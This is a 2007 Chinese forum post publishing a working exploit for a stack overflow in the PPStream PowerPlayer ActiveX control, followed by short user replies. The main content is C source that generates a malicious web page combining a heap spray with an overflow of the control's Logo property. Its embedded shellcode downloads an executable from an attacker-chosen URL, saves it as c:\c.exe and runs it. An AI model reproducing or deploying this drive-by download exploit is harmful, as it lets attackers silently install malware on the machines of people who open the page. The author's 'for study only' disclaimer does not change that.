-
-
[原创]PPStream 最新版堆栈溢出利用
-
发表于: 2007-8-19 12:34
-
// 昨天无聊,搞了一下 PPStream。发现其有很多的编码问题。
// 其中好多接口方法都没有严格检查参数,堆溢出和栈溢出都有, 。
// PowerList.ocx, PowerPlayer.dll 都有此类问题, 这里利用的是 PowerPlayer.dll 中的栈溢出。
// 只用于交流学习用,不要用于xx, 否则后果自负。
// 附:最近老是贴代码,这因为自己的表达能力就只要这些了
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[174] =
{
// 必须是偶数大小
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};
const char* script1 = \
"<html><body><object id=\"ppc\" classid=\"clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458\"></object><script>"
"var shellcode = unescape(\"";
const char* script2 = \
"\");"
"bigblock = unescape(\"%u9090邐\");"
"headersize = 20;"
"slackspace = headersize + shellcode.length;"
"while ( bigblock.length < slackspace ) bigblock += bigblock;"
"fillblock = bigblock.substring(0, slackspace);"
"block = bigblock.substring(0, bigblock.length - slackspace);"
"while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
"memory = new Array();"
"for (x=0; x< 400; x++) memory[x] = block + shellcode;"
"var buffer = '\\x0a';"
"while (buffer.length < 500) buffer += '\\x0a\\x0a\\x0a\\x0a';"
"ppc.Logo = buffer;"
"</script>"
"</body>"
"</html>";
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("ex:fuckpps url\nwritten by dummyz@126.com (2007)\n");
return -1;
}
FILE *file = fopen("fuckpps.html", "w+");
if ( file == NULL )
{
printf("create 'fuckpps.html' failed!\n");
return -2;
}
fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
fprintf(file, "%s", script2);
fclose(file);
printf("make 'fuckpps.html' successed!\n");
return 0;
}
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
原来这是你,你才潜水牛人啊
|
|
|
|
|
|
|
|
|
|
|
|
直入主题.....酷....
学习
|
|
|
ppstream 已经修正次问题,其新版本将不久发布
希望此软件未来很好很强大 
|
|
|
|
|
|
 牛人这么发现的,以此为实例讲解一番噻
|
|
|
|
|
|
|
